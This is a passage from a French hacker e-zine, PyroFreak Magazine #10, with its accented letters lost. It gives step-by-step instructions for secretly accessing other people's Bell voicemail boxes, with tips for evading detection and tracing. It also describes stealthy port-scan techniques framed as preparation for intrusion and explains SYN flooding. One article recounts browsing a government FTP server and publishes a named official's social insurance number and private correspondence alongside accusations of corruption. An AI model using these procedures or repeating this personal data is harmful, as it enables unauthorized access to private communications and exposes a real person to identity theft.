                                   *********


3-d)*-*Les tapes pour accder au menu d'une Bote Vocale  partir de son
       numro d'origine*-*

-Vous composez le numro de tlphone qui  la Bote Vocale  hacker

-Attender que le message d'intro dbute, et appuyer sur 9

 "Veuiller composer votre mot de passe"

-Composer le mot de passe suivi du #

*** ce point, vous avez accs au Menu***


3-e)*-*Vous trouvez un message intressant sur la Bote Vocale hacker,
       et vous voulez savoir d'ou il provient*-*

	Si vous trouvez un message sur la Bote Vocale hacker, et que celui-ci
vous semble intressant, et vous aimeriez savoir de quel numro il provient.
Heh bien, rien de plus simple si la personne qui  envoy le message n'a pas
utilis le service confidentiel (*67). couter le message en question, et
ensuite tapper 8 (Pour y rpondre),  ce point la, la voix robotis du
systme va vous donnez la provenance de l'appel.


*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*
*+ 4- Comment faire pour hacker une Bote Vocale TlRponse mme quand  +*
*+    son propritaire est prsent?                                      +*
*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*

Deux possibilits s'offrent  vous.

	Si vous possdez vous mme un service TlRponse, vous n'avez qu'
faire la procdure habituel pour vous connecter  votre Bote Vocale (*98).
Vous allez entendre la phrase suivante: " 'Votre Nom D'usager' veuiller 
composer votre mot de passe, ou encore appuyer sur  '*', si vous avez
compos le mauvais numro de Bote Vocale". Quand vous entendez cette phrase,
vous tappez sur '*',  ce point vous allez entendre: "Le numro de la Bote 
Vocale Svp". C'est a ce moment que vous composez le numro de la Bote Vocale
de votre cible, qui est le code rgional suivi du numro de tlphone 
(XXX-XXX-XXXX). Une fois le numro de la Bote Vocale compos, vous allez 
rentendre le message d'origine: "'Nom D'usager de la cible' veuiller 
composer votre mot de passe" . Quand vous tes rendu  ce point, vous pouvez
encore vous dbrancher de la Bote Vocale que vous tes en tappant sur '*',
mais une fois que vous avez composer un mot de passe, vous ne pouvez plus
changer de Bote Vocale. En tappant sur '*' ca vous dconnecte automati-
quement du systme.


	Si vous possdez pas de service TlRponse, heh bien j'ai un moyen
pour vous qui est quand mme efficace, mais ca vous demande un petit effort.
Vous devez trouver un numro de tlphone d'une rsidence ou d'une entreprise
muni du service Tlrponse et que son propritaire est absent, et vous 
tapper '*' durant le message d'intro. Pour plus d'Information, aller revoir
la parti *Les tapes pour accder au menu  partir d'un autre Bote Vocale*
un peu plus haut dans ce document. Aprs 17 heure, c'est assez facile  
trouv vu que les entreprises ferment vers cette heure la.

	Donc, avec les 2 mthodes que je viens de vous dcrire, vous pouvez
hacker la Bote Vocale TlRponse  l'insus de son propritaire, meme si
celui ci est  coter de celle-ci.


         *+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*
         *+ 5- Menu d'une Bote Vocale du Service TlRponse +*
         *+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*+*


Menu de la personne qui envois un message sur une Bote Vocale TlRponse 
               ('#' apres le message enregistr)

1-Si vous etes satisfait de votre message
      1-Pour envoyer votre message en mode de transmission normal
      2-Pour envoyer votre message en mode de transmission urgent
2-Pour entendre votre message
3-Pour effacer et enregistrer de nouveau
4-Poursuivre l'enregistrement  partir de l'endroit ou vous vous tiez arrter




                Menu de la Bote Vocale Tlrponse

11- Pour couter les messages non entendus
     6-Faire parvenir une copie  quelqu'un, accompagn de vos remarques
             0-option   
                  1-Priv
                  2-Urgent
                  3-Confirmation
                  4-transmission diffr
                        1-Pour indiquer la date
                  #-Pour envoyer le message des maintenants
                  *-Pour annul   
     7-Effacer le message
     8-Pour y rpondre 
            0-option  
                  1-Priv
                  2-Urgent
                  3-Confirmation
                  4-transmission diffr
                      1-Pour indiquer la date
                  #-Pour envoyer le message des maintenants
                  *-Pour annul 
     9-Sauvegarder le message
     #-Pour sauter le message
1- Pour couter vos messages
2- Pour envoyer un message
     0-option  
          1-Priv
          2-Urgent
          3-Confirmation
          4-transmission diffr
               1-Pour indiquer la date
          #-Pour envoyer le message des maintenants
          *-Pour annul cet destination              
3- Pour repr un message                     
4- Modifier vos Options personnels
     1-Activ ou dsactiv Avis de message 
        3-Pour activ
        4-Pour la dsactiver
        *-Pour quitter
        #-Confirmer
     *-Annuler
     2-Modifier les options de gestions
        1-Pour contrler les mots de passe
        2-Pour tablir ou modifier des listes de distribution de groupe
        3-Pour changer les niveau de message guide
           1-Pour entendre les messages guide normaux
           2-Pour entendre les messages guide dtaills
           3-Pour entendre les messages guide brefs
        4-Modifier l'option date et heure
           1-Pour activ l'option Date et Heure
           2-Pour dsactiv l'option Date et Heure 
        *-Retour au menu prcdent
     3-Pour enregistrer des messages d'accueil
        1-Pour modifier votre message d'accueil personnel
        3-Pour modifier votre nom pr-enregistr
     *-Pour quitter (Retour au menu prcdent)
*-Rompre la communication



	Les choses  retenir de ce menu, c'est que '*' sert toujours 
retourner au menu prcdent lorsque vous tes pas dans le menu principal, et
le '#' est pour confirmer une action.



                              *+*+*+*+*+*+*+*+*
                              *+ 6- Conseils +*
                              *+*+*+*+*+*+*+*+*

	Quand vous appeler un service de TlRponse, je vous conseil FOR-
TEMENT de faire *67 (Numro Confidentiel), c'est gratuit et c'est pas 
beaucoup plus long a faire. Et vous liminer les chances de vous faire 
achaler par l'entreprise ou l'individu en question.

	Quand vous rendez visite  une Bote Vocale TlRponse, essayer
de pas laisser de trace. Ce que je veux dire pas la, c'est que exemple
sur la Bote Vocale en question il y a quelques nouveaux messages, et vous
avez le got de les couter. Mais il a un probleme. Comment laisser la
mention nouveau message, sinon l'oprateur de la Bote Vocale va trouver
ca bizzare que la mention ne soit pas dit, et surtout que les messages 
sont rendu dans les archives ou ffacs. C'est pourquoi j'ai la solution 
votre probleme. Quand vous coutez les messages, vous n'avez qu' appuyer
sur '#' pour sauter au message suivant. Et miracle, la mention nouveau
message reste.

	Je vous conseil de hacker un service TlRponse  partir d'une
cabine Tlphonique. Comme a, vous liminez quasi totalement les risques
de vous faire buster (Mme que si les risques sont vraiment minible, vu que
ce n'est pas un dlit trs grve). Mais, pour ce qui est du crackage du mot
de passe, vous pouvez le faire de chez vous. Parce que si vous changez rien
 la configuration du systme TlRponse, personne va le savoir que vous 
avez trouv le mot de passe.



	Bon, maintenant pour ce qui est du 0,25$ que ca coute pour appeler
 partir de la Cabine ou du long distance a partir de chez vous, il a une 
solution pour liminer cela, qui est lgal  100%. Saviez vous que les 
1-800 ou 1-888 sont gratuit a partir d'une cabine tlphonique et surtout
ne cote aucun long distance. Heh bien oui, donc vous appeler un 1-800 ou
un 1-888 qui possde un service TlRponse, et vous suivez les procdures
que j'ai dis dans le chapitre *Les tapes pour accder au menu  partir d'un
autre Bote Vocale*.

	Donc, vous pouvez accder  une Bote Vocale TlRponse gratuitement
 partir d'une cabine, et vous avez encore moins de chance de vous faire
retracer, vu que c'est comme un transfert de box. Et aussi vous pouvez hacker
n'importe quel Bote Vocale TlRponse, mme si elle est  l'autre bout du 
Qubec, vu qui  pas de long distance.

	Et pour le monde qui lisent entre les lignes, ca veux aussi dire que
vous pouvez laisser un message sur Le tlrponse a quelqu'un a partir d'une 
cabine tlphonique, sans que ca vous cote une cent. Donc profiter en. 
Je vous aurais bien donner une liste de 1-800 avec TlRponse, mais j'en
ai pas assez pour le moment, et je tiens  garder ceux que j'ai le plus 
longtemps possible. C'est pourquoi si j'en trouve d'autres, je vais les 
rajouter dans une prochaine version de ce document.

NB: La boite Vocale 1-800 doit se trouver  l'origine dans le meme exchange
    (450,514,819,418)

                             *+*+*+*+*+*+*+*+*+*
                             *+ 7- CONCLUSION +*
                             *+*+*+*+*+*+*+*+*+*

	Pour conclure, si vous avez bien compris e document, vous tes 
suprieur  plusieurs Vendeurs de produits Bell Canada en matire de 
connaisance des TlRponses. Y connaissent rien les CRIS!


 venir: Tutorial sur les TlRponse Plus et Tutorial sur les
         systemes Centrex.   VIVE LE QUBEC!!!

J'aimerais souligner la collaboration de Bell Canada envers ce document.

Salut


 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
|3-L'utopie du portscan
|( ) Phreak (X) Hack ( ) Autres
'.__________Par LeMarquis________  ________  lemarquiz@yahoo.com ______ ___

	Le port scan est une activit essentielle pour toute tentative
d'intrusion. Connatre les services prsents sur un serveur est primordial 
pour pouvoir en abuser. Cependant les vieilles techniques de portscan sont 
devenues dsutes avec l'arrive de programme complexe qui analyse le trafic 
internet  (logger). Je vous ferai part des techniques lmentaires de 
portscan ainsi que des nouvelles techniques plus difficiles  dtecter. Je me 
concenterai sur les TCP portscan et je laisserais de cot les UDP et les ICMP 
scans. Les TCP portscans se divisent en 3 catgories : les scans simples, 
ceux qui se font sans proxy, les bounces scan, ceux qui utilisent un proxy et 
le scan complexe, qui utilise un proxy + des spoofs packets (source 
modifie). Dans mes schmas, j'utiliserai le nom de CIBLE pour l'IP  scanner 
et EVIL pour notre propre IP. Le caractre stealth reprsente la facult qu' 
un type de scan de n'tre pas dtect.



------========------------------------------=-=-=----
-+-+-Scans simples-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
------========-----------------------------------------=-=-=----


1-TCP Connect(): 
Vitesse: Trs rapide Stealth: Faible
Ceci est le type de scan le plus simple. Ce n'est que la demande classique et 
lgitime de connexion sur un port de notre cible. N'importe quel user sur un 
serveur unix, a accs  ce type de scan. C'est le TCP connect qui est 
utiliser dans le programme unix strobes qui a l'avantage de scanner seulement 
les ports de votre /etc/services, ceux des services connus. Le fort 
dsavantage de ce type est le niveau de stealth trs mauvais. Les fichiers de 
log des programme qui grent les services, vont tous noter l'IP d'EVIL.



EVIL                CIBLE
     SYN ---->
       <---- SYN|ACK
SYN|ACK ---->


2-TCP SYN scanning:
Vitesse: Rapide Stealth: Moyen
Surnomm le 'half-open' scan, ou le demi-scan. Nous ne faisons ici pas un 
connexion compltement. Nous envoyons d'abord un SYN  la cible. Si son port 
est ouvert elle nous renvoie un SYN|ACK. Immdiatement aprs que l'on reoive 
son packet, nous lui envoyons un RST qui annule la demande de connexion. 
L'avantage de cette technique est que plusieurs OS ne la dtecteront pas.



EVIL                CIBLE            
     SYN ---->  
       <---- SYN|ACK 
     RST ----> 


3-TCP FIN scanning:
Vitesse: Moyenne Stealth: Moyen
Le TCP SYN scan n'est cependant pas parfait, certain firewall et packet 
filter bloquent les FIN packets. De plus plusieurs loggeurs russissent  
dtecter ce scan. Il nous reste  utiliser des FIN packets au lieu de nos RST 
packets utiliss prcdemment. L'envoie d'un FIN dit  la cible de ne plus 
envoyer d'autres packets. Certain OS ont contrairement tendance  envoyer un 
RST packet ce qui annule l'effet stealth. Tout ceux tournant sur Microsoft ne 
sont pas vulnrable, sauf que la plupart des autres le sont.



EVIL                CIBLE
     SYN ---->
       <---- SYN|ACK
     FIN ---->


------========------------------------------=-=-=----
-+-+-Bounce scan-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
------========-----------------------------------------=-=-=----

*
4-FTP bounce attack:
Vitesse: Lente Stealth: Fort
Un vieux bug dans le protocole FTP permet d'effectuer des portscans a mme 
une session ftp. Il s'agit d'utiliser la command PORT sur un ftp. Le PORT 
tentera de se connecter sur notre cible au port que l'on veut vrifier. 
Ensuite avec la commande LIST, le ftp envoiera le contenu du rpertoire 
courant dans le port de notre cible. Le commande rpondra soit par "transfer 
will be successful" si le port est ouvert, sinon par "425 Can't build data 
connection: Connection refused." si le port est fermer. Ce bug vient du fait 
que nous pouvons tablir une connexion proxy sur un ftp. Il faut noter que 
les serveur ftp rcents enlvent la possibilit d'un proxy. Ce type de scan 
cache presque compltement la trace d'un portscan venant de votre IP. Le ftp 
serveur garde toujours un log de toutes vos demandes de proxy. Votre scan 
reste en log sur le ftp pour un certains nombres de jours.



EVIL       FTP      CIBLE
 <--session-->
PORT ---->   SYN --->
LIST ---->
     <----  RESULT


5-SOCKS bounce:
Vitesse: Lente Stealth: Fort
Les socks serveurs sont des redirecteurs souvent prsents sur des wingates au 
port 1080. On peut se connecter sur un autre serveur en partant de ces socks. 
On peut donc faire un portscan avec le socks. Semblable au FTP bounce, nous 
ferons un scan avec notre socks qui essayera de se connecter sur les port de 
notre cible. Le socks fera un TCP Connect() sur la cible et sera peut-tre 
logger sur notre cible. Tout comme le FTP bounce nous pouvons tre retracer 
par les logs du wingate grant le socks.



EVIL            SOCKS      CIBLE
 <--connexion->  SYN ----->
     <-------- RESULT

6-Web proxy scan:
Vitesse: Lente Stealth: Fort
Les web proxy, qui sont courant sur le net, peuvent aussi servir de 
redirecteur pour nos scan. Avec une bounce, on peut demander  notre web 
proxy de se connecter sur la page web fictive de notre cible  un certain 
port. Le web proxy nous dira comme rponse s'il a bien russi  se connecter 
et qu'il n'a pas pu avoir le contenu web (surprenant!). Cependant de nombreux 
web proxy n'acceptent seulement de se connecter sur les pages web ayant comme 
port 80 ou 8080. De plus, il faut faire attention  ne pas prendre de web 
proxy qui sont publique car ceux-ci renvoient votre IP en "forward" quand ils 
russissent  se connecter sur un port de notre cible. La grosse lacune de ce 
scan est que les rponses des web proxy sont rarement les mmes d'un proxy  
l'autre. Certains proxy ne veulent tout simplement pas nous dire s'ils ont 
russi  se connecter. Ce bounce utilise le web proxy pour scanner la cible 
et comme pour tout les bounces, le proxy conserve encore les prcieux logs de 
notre scan.


EVIL                PROXY      CIBLE
<--connexion-->
GET CIBLE:PORT -->  SYN -->
               <--  RESULT


------========------------------------------=-=-=----
-+-+-Scan complexe-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
------========-----------------------------------------=-=-=----


7-Idlescan:
Vitesse: Trs lente Stealth: Trs fort
Le idlescan est le dernier n des portscans. Il est trs complexe mais 
quasiment indtectable. Il utilise le nombre "ip.id" qui se trouve sur chaque 
TCP packet. Ce ID monte d'une unit  chaque packets envoys, nous pouvons 
alors deviner le nombre de packet envoys par un certain IP pendant un 
certain temps. Si l'on envoie un SYN sur un port fermer, l'ID de notre packet 
augmentera d'une unit, tandis que si le port est ferm le ID restera le 
mme.

Port ferm:
EVIL                CIBLE
     SYN ---->
       <---- SYN|ACK
ID + 1 

Port ouvert:
EVIL                CIBLE
     SYN ---->
       <---- RST
ID

Ce qui nous amne  utiliser des IP sans trafic qu'on n'appellera des 
senseurs. Ils peuvent tre soit des routeurs ou des imprimantes. Ceux-ci ne 
doivent absolument pas avoir de trafic de packet car cela changera leur 
numro de ID. Premirement, nous regardons le ID de notre senseur. Ensuite 
nous envoyons un SYN spoof packet (source modifi) sur notre cible avec comme 
source notre senseur. Finalement, nous trouvons le nouveau ID de notre 
senseur. La cible recevra le SYN packet, voyant qu'il a comme source notre 
senseur, il envoiera sa rponse  notre senseurs. Si le ID du senseur a 
augment, le port de la cible est ferm, si il reste le mme alors le port 
est ouvert.


Port ouvert:
EVIL                CIBLE       Senseur
(senseur) SYN ---->
                   SYN|ACK ---> ID+1

Port fermer:
EVIL                CIBLE       Senseur
(senseur) SYN ---->
                     RST --->   ID

Voici enfin cette technique. Elle est presque 100% indtectable. Notre spoof 
packet envoy sur la cible ne peut pas tre retracer et notre vrification du 
numro de ID du senseur n'est pas logger. Le scan semble venir du senseur 
avec un TCP connect, mais le senseur ne log rien. Cette mthode tant trs 
rcente et complexe, elle demeure trs lente. Un de ces dsavantages est de 
trouver de bons senseurs. Avec plusieurs, nous pouvons augmenter la vitesse 
du scan.


8-Fragmentation:
Ce n'est pas prcisment un autre technique de scan mais plutt une 
modification que l'on peut faire sur chaques scan (en excluant les bounces et 
le idlescan). Au lieu d'utiliser des TCP packets complets, nous utilisons des 
packets diviss. Ce qui rend la vie des logger et des filtres de packet 
difficile. De nombreux crash quand il reoivent ce type de packet. Par 
contre, nous ne pouvons utiliser ce type de packet sur certaine cible qui ont 
un firewall qui bloque tous les packet fragments.



	Finalement, pratiquement tout ces scans ncessitent un accs root sur 
un serveur unix. Les types accessibles  un user ou  un windows user est le 
TCP Connect() et les bounces scan. Cependant, les programmes de scan sur 
windows sont moins diversifis. Ils sont condamner a utiliser des types de 
scan peu sophistiqu. Chaques scan a ses avantages, aucun n'est parfait. La 
vitesse et le niveau de dtectabilit sont deux qualits trs importantes. 
Pour ce qui est des bounce scan, la facilit  trouver un proxy est aussi un 
avantage. Je ne vous cacherai pas ma prfrence pour le TCP SYN scan pour les 
fast et assez stealth scan. J'ai aussi une grande admiration devant les 
merveilles du idlescan, ce scan carrment utopique. Chaqu'un  sa prfrence 
sur un type de scan, et les gots ne se discutent pas...


------========-----------------------------------------=-=-=----

[ Programmes pour le scan ]

Les windows portscanner et strobes ; Revelation
1-TCP Connect()

Nmap Fyodor's Stealth Port Scanner ; http://www.insecure.org/nmap/
1-TCP Connect()
2-TCP SYN scanning
3-TCP FIN scanning
4-FTP bounce attack
8-Fragmentation

Socks Scan V 2.0 by ICEHOUSE ; sos.tgz
5-SOCKS bounce

Proxy Bounce Scanner ; pbs.c
6-Web proxy scan

idlescan v0.1-alpha3 by LiquidK ; idlescan-v0.1-alpha3.tgz
7-Idlescan

------========------------------------------=-=-=----

References:
Phrack 51 Fyodor Article - http://www.insecure.org/nmap/p51-11.txt
BugTraq Linux blind TCP spoofing -  http://www.securityfocus.com/
Liste de Web proxy et de socks - http://proxys4all.cgi.net/
Idlescan README


 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 4-Le SYN flooding
|( ) Phreak (X) Hack ( ) Autres
'.__________Par Endrix________  ________  lordendrix@hotmail.com____ ___


Introduction:

Bon la chu tannez de recevoir des emailz pour me demander comment faire
un flood SYN. Alors la je vais vous dire comment ca marche et non comment
le faire parce que nos amis(es) de la GRC n'ont pas l'air d'aimer ca.


Explication:

Le principe est assez simple : une machine A envoie  une machine B un
paquet SYN semblant venir d'une machine X non accessible   teinte  ou
qui n'existe tout simplemement pas. La machine B envoie donc le second 
paquet pour l'ouverture de la connection et attend la  rponse  de  la
machine X, qui ne viendra jamais.

Ainsi, la machine B aura une connection monopolise pendant un certain 
laps de temps. Si la machine A envoie de   nombreux  paquets  SYN,  la
machine B peut devenir sature et ne plus  accepter      de  nouvelles
connections. Cette attaque fait donc partie des attaques du type refus
de service, puisque la machine cible devient indisponible   et  refuse
ainsi un service  d'autres utilisateurs.

Plusieurs erreurs possibles:

-> Unreachable host
-> Reset
-> Time Exceeded


Conclusion:

Bon, j'ai au umpeu d'aide pour les expressions dans ce texte mais dans
l'ensemble j'espre que vous avez compris comment marche le packet SYN
et j'espre que vous allez arrter de m'envoyer des  emailz  demandant
de l'aide  ce sujet.



n.b. Ceci est pour la GRC : "Essayez de trouver quelque chose d'illgal
     dans ce texte bande d'enfoir :)"





 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 5-Certains code rgionaux de Bell&Cantel
|(X) Phreak ( ) Hack ( ) Autres
'.__________Par Endrix________  ________  fbasoft@yahoo.com ______ ___


Voici les codes rgionnals pour les pagettes et cellulaires dans la rgion
                               de Montral (514)
===========================================================================

Cellulaire Bell: 212 213 214 217 221 231 232 233 234 235 236 237 238 239 
                 249 304 306 386 404 592 709 786 869 891 893 894 895 910
                 912 913 914 915 916 917 918 919 920 929 942 943 946 949
                 951 953 955 957 978 980 984
Pagette Bell: 201 202 203 204 230 301 361 404 407 408 423 440 517 520 521
              580 719 837 851 853 857 859 869 879 896 921 960
Cellulaire Cantel: 240 241 242 243 244 262 497 501 591 594 726 758 781 823
                   824 825 826 857 862 865 867 880 892 898 909 924 927 928
                   941 944 945 947 952 975 979 983
Pagette Cantel: 201 290 361 402 801 854 930 936
Clearnet Mike: 820 821 829 832 863 977
Clearnet PCS: 805 808 816 817 830 831
Cellulaire Microcell: 570 571 572 573 574 575 576 577 578 803 812 813 814
                      815 992 993 994 995 996 998 999


Voici les diffrents codes de Montral
======================================

(514)
205 215 223 251 252 253 254 255 256 257 259 270 271 272 273 274 275 276 
277 278 279 280 281 282 283 284 285 286 287 288 289 302 312 321 322 323
324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341
342 343 344 345 350 351 352 353 354 355 356 362 363 364 365 366 367 368
369 370 374 376 380 381 382 383 384 385 387 388 389 390 391 392 393 394
395 396 397 398 399 406 448 480 481 482 483 484 485 486 487 488 489 490
493 494 495 496 497 498 499 502 522 523 524 525 526 527 528 529 530 540
590 591 593 594 595 596 597 598 599 640 642 643 644 645 648 650 667 673
720 721 722 723 724 725 727 728 729 731 732 733 734 735 736 737 738 739
740 741 744 745 747 748 749 751 760 761 762 765 766 767 768 769 790 801
807 818 823 840 841 842 843 844 845 846 847 848 849 850 852 855 856 858
860 861 864 866 868 870 871 872 873 874 875 876 877 878 881 888 890 897
899 906 907 908 925 926 927 931 932 933 934 935 937 938 939 940 948 954
956 981 982 983 985 986 987 988 989 990 991 992 993 997


Voici les codes rgionnals pour les pagettes et cellulaires dans la rgion
                              de Ottawa (613)
====================================================================================

Cellulaire Bell: 290 292 293 299 612 720 724 725 761 791 794 795 798 850 859
Cellulaire Cantel: 240 286 291 302 762 769 796 797 799 851 852 862
Pagette Cantel: 220 239 364 560 566 597 751 780 786 787
Clearnet Mike: 223
Clearnet PCS: 266 277 282 325
Clearnet: 229
Cellulaire Microcell: 261 262 265 276
Cellulaire: 719


Voici les diffrents codes de Ottawa
====================================

(613)
224 225 226 228 230 231 232 233 234 235 236 237 238 239 241 244 245 247 248
249 260 274 298 350 364 368 520 521 523 526 560 562 563 564 565 566 567 569
580 581 593 594 596 597 598 660 688 719 721 722 723 724 725 726 727 728 729
730 731 733 734 736 737 738 739 740 741 742 744 745 746 747 748 749 750 751
755 759 760 761 763 765 768 780 781 782 783 784 785 786 787 788 789 792 798
820 828 829 842 844 860 863 940 941 943 944 945 946 947 951 952 954 957 990
991 992 993 995 996 998


Voici les codes rgionnals pour les pagettes et cellulaires dans la rgion
                                 de Hull (819)
==================================================================================


Cellulaire Bell: 664 712 773 775 790
Cellulaire Cantel: 743 773 921 923
Pagette Cantel: 772 773
Clearnet Mike: 955
Cellulaire Microcell: 328 329



Voici les diffrents codes de Hull
====================================
(819)
243 246 328 420 503 561 568 595 770 771 772 775 776 777 778 779 790 920 953
955 956 994 997




 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 6-La GRC introduite par un anonyme
|( ) Phreak (X) Hack ( ) Autres
'.__________Par LeMarquis________  ________  lemarquiz@yahoo.com ______ ___


	Est-ce qu'il n'existe pas de cible plus symbolique que la GRC pour 
nous, jeunes rebelles des temps modernes. Mais qu'est-ce que la GRC a de si 
spciale ? Elle est a d'abord su appliquer la loi qu'on utilise pour
les tuer et violeur sur de jeunes curieux explorant les rseaux informatique 
et tlphonique. Elle a de plus harceler un grand nombre d'entre eux. Il 
s'agit de voir un peu l'histoire du underground qubcois pour voir qu'il est 
jaillionn de bust de cette police fdrale. Le prestigieux groupe NPC a 
lui-mme t la victime d'attaque de ces pseudo-justicier. Le fait que les 
agents fdraux gagne plus de 60 000$ n'arrive pas a suscite ma colre mais 
le fait qu'il ose encore chialer contre leur suppos condition de travail 
difficile ou il risque chaque jours leur vie me rend dangereusement violent. 
Certain croiront que je ne fais que rpter de vulgaire prjug. Je vous 
donnerai la preuve concrte dans ce mme article.


	Tout a commencer lorsque tard dans la nuit ou plutt tard le matin, 
je m'interessa avant de m'tendre au site officiel de la grc 
(www.rcmp-grc.gc.ca). Ce site me paraissait intressant sur son contenu sur 
certaine loi concernant le fameux 'crime' informatique. Par simple curiosit 
j'ai effectuer une panoplie de scan sur le serveur. Je porta en premier mon 
attention sur le ftp service.

Banner du ftp:
------------------------------------------------------------------
Government of Canada / Gouvernement du Canada
-------------------------------------------------------------------
This server is owned and operated by the GTIS branch of the ministry
of Public Works and Government Services Canada (PWGSC).  Ce serveur
(server) appartient et est opr par les SGTI; un dpartement du
ministre des Travaux publics et Services gouvernementaux Canada (TPSGC).
-------------------------------------------------------------------
WARNING / AVERTISSEMENT
UNAUTHORIZED ACCESS IS PROHIBITED UNDER SECTIONS 326, 342.1, & 430(1.1) OF
THE CRIMINAL CODE OF CANADA.   VIOLATORS WILL BE PROSECUTED.  L'ACCS SANS
AUTORISATION EST DFENDU EN VERTU DE LA SECTION 326, 342.1 OU 430 (1.1)
DU CODE CRIMINEL CANADIEN. TOUTE VIOLATION FERA L'OBJET DE POURSUITES.
-------------------------------------------------------------------

	Je suis prt a gager que nombreux sont ceux qui ont sursauter en 
voyant cette avertissement. Ils ont aussitt fermer leur ordinateur et se 
sont planquer en attendant les sirnes. Il est vrai que ce message est 
quelque peu apeurant, ne seraisse que celui-ci permet un certain support 
lgale contre une poursuite. Il ajoute aussi que "TOUTE VIOLATION FERA 
L'OBJET DE POURSUITES.", il faut cependant tre trs naf pour croire a cette 
partie du texte.

	Avec les prcaution ncessaire, j'ai essayer plusieurs login et 
password par dfaut sur le serveur. Je ne fut pas surpris de voir aucun 
account prsent. J'avais a faire a un site gouvernemental et mme judiciaire. 
Mais j'avais oublier l'account le plus courant et le plus inoffensif: 
l'ANONYMOUS. Ce mme username si utiliser dans les ftp publiques. Il est 
parfois prsent sur les serveur unix, mais nous laisse habituellement peu de 
libert, en nous restreignant dans certain directory sans accs d'criture, 
ni accs a de l'information priver du serveur.


	Je n'en croyait pas mes yeux quand j'ai vu que le ftp s'ouvrait a moi 
dans la vrai racine du serveur (/). Oui je n'tait pas emprisonner dans des 
directory vides sans importance. Je pouvais lire plusieurs directory et me 
promener a ma guise dans l'ensemble des fichiers du serveur. On m'avait 
retirer le droit d'criture, je ne pouvait penser a modifier leur page web.


Carte au Trsor

-----------------------------------------------------------------


  /   =========>   departments/  ========> pwgsc/     ||
                      				      ||
						      ||
        $$$$Grant's CD$$$$   <======  gwtrans/   <====


-----------------------------------------------------------------


	Nous avons su avec le banner du dbut que le site tait maintenu par 
Public Works and Government Services Canada (PWGSC). On retrouve donc les 
documents de ce ministre sur le serveur et malheureusement pas ceux de la 
GRC. Avis a ceux qui croyait que la cia.gov habritait tout les documents 
classer top secret. Nous avons donc ici les documents de travail de Grant. 
Mais qui est ce Grant ? Grant Westcott est le Sous-ministre adjoint au 
Services gouvernementaux de tlcommunications et d'informatique (SGTI) et 
aux Travaux publics et Services gouvernementaux Canada (TPSGC). Il est le 
responsable de tout ce que le gouvernement prend comme dcision au sujet des 
services de tlcommunications et d'informatique. Il est donc l'adminis- 
trateur de l'ensemble des rseaux du gouvernement fdrale. Il semble aussi 
proche du premier ministre Jean Chrtien qui est mentionn dans un grand 
nombre de ces documents de travail.


	Notre gouvernement fdrale est corrompu jusqu' la moyelle. Aprs le 
ministre des finances qui exploitait un compagnie de bateau au Canada. Mais 
cette entreprise tait enregistr dans un paradis fiscaux des Antilles, de 
quoi sauv beaucoup d'argent en impt. Voici que notre l'admin informatique 
Westcott imite celui-ci. Et oui, ce n'est aprs avoir consulter quelques 
documents fdraux sur le site de la GRC que l'on voit la magouille qui ce 
joue a Ottawa. En voici la preuve :


/*
Canadian Offshore Financial Services
Suite 1869, Manulife Place,
10180 - 101 Street,
Edmonton, Alberta,
Canada
T5J 3S4


Dear Mr. Michael Ritter:


	I would appreciate receiving further details on how one goes about 
establishing residency and/or citizenship in Belize, the Bahamas, Malta, 
Cayman, the Turks and Caicos or any other countries with favourable tax 
policies for Canadian who are about to retire.  In our circumstances, I am a 
senior civil servant who is starting to plan for retirement and will be in 
receipt of a pension of just under $80,000 per annum.  In addition my wife 
and I will have assets (RRSPs, equity and real estate) worth approximately $1 
Million.
*/

	Notre Westcott veux maintenant quitter le pays, et transfr sa 
pension du gouvernement et ses avoirs personnel d'une valeur d'un millions de 
dollar dans un de ces paradis fiscaux. Et choisira finalement dans une 
seconde lettre le Belize. Il ne se contente pas seulement de quitter le pays 
avec un million, il envoie aussi une lettre directement  Revenue Canada en 
demandant une rduction d'impt avec comme raison qu'il est aussi employer au 
ministre de la Justice.


/*
Name:					Grant Charles Westcott
S.I.N.:					434-153-599

Employer				Justice Canada
					2nd floor
					LaSalle Building
					Ottawa, Ontario
					K1A 0H8
					Attn:  Connie Murray

This is a request to renew my deductions at source for calendar year 1998.  I 
am requesting a deduction of $7800/annum.
Thank you
Grant C. Westcott
*/

	On voit l comment sa marche au gouvernement. Tout le monde se grasse 
la patte entre eux. Aprs on entend dire par cette administration comment il 
aime leur pays et comment il font leur possible pour son progret. Hypocrisie. 
Ils ne nous s'agissait de faire un petite intrusion sur le site de la GRC 
pour apprendre le contraire. Ce fut propablement l'intrusion la plus minable 
jamais faite contre un site du gouvernement. Je vous dirai qu'elle est  
l'image de la GRC qui elle-mme s'occupe de notre propre scurit. On peut 
faire un parallle avec le ministre de la justice qui est suppos rendre 
justice  la population et qui rend des avantages sociaux  certains requains 
financiers. Il n'en demeure pas moins que les documents personnelles et de 
travail sont encore disponible avec le ftp de la GRC. Quiconque veut 
confirmer mes dires pourra en anonymous prendre les documents qu'il lui faut 
en suivant la carte au trsor. Il faut noter que l'accs anonymous est 
parfaitement lgale car il est publique.


	J'ai faite beaucoup de promenade sur les rseaux du gouvernement 
provincial. Je peux vous dire que jamais je n'ai vu un seule document que je 
trouvais louche. Avec le site de l'an 2000, je n'ai que fait exprimer mon 
opinion sur le sujet du bug. Cependant aprs seulement une seule visite sur 
un site fdral je me retrouve avec plusieurs documents compromettant. Est-ce 
un hasard ? J'en doute. En reprenant les mots d'un certain auteur de NPC " La 
distance en ce monde attire la paperasse et depuis toujours elle est un 
facteurs de corruption... " Quand l'on pense que certains ne veulent pas se 
dlaisser de cette plaie...


 ____ __ **1er Anniversaire**_ _______ ________ __PyroFreak Magazine #10
| 7-Alladvantage
